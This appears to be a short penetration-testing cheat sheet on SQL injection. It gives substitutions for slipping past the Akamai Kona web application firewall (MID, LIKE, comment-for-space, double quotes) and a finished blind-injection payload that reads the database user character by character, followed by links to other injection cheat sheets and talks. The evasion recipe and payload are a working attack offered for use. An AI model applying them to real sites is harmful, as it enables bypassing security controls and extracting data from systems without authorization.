SQLI

Akamai Kona Bypass

• MID instead of SUBSTRING

• LIKE instead of =

• /**/ instead of a space

• CURRENT_USER instead of CURRENT_USER()

• " instead of '

Final example:

444/**/OR/**/MID(CURRENT_USER,1,1)/**/LIKE/**/"p"/**/#

Blogs

• http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/

• http://isc.sans.edu/diary.html?storyid=9397

• http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

• http://www.evilsql.com/main/index.php

• http://xd-blog.com.ar/descargas/manuales/bugs/full-mssql-injection-pwnage.html

• http://securityoverride.com/articles.php?article_id=1&article=The_Complete_Guide_to_SQL_Injections

• http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/

• http://sqlzoo.net/hack/

• http://www.sqlteam.com/article/sql-server-versions

• http://www.krazl.com/blog/?p=3

• http://www.owasp.org/index.php/Testing_for_MS_Access

• http://web.archive.org/web/20101112061524/http://seclists.org/pen-test/2003/May/0074.html

• http://web.archive.org/web/20080822123152/http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html

• http://www.youtube.com/watch?v=WkHkryIoLD0

• http://layerone.info/archives/2009/Joe%20McCray%20-%20Advanced%20SQL%20Injection%20-%20L1%202009.pdf

• http://vimeo.com/3418947

• http://sla.ckers.org/forum/read.php?24,33903

• http://websec.files.wordpress.com/2010/11/sqli2.pdf

• http://old.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

• http://ha.ckers.org/sqlinjection/

• http://lab.mediaservice.net/notes_more.php?id=MSSQL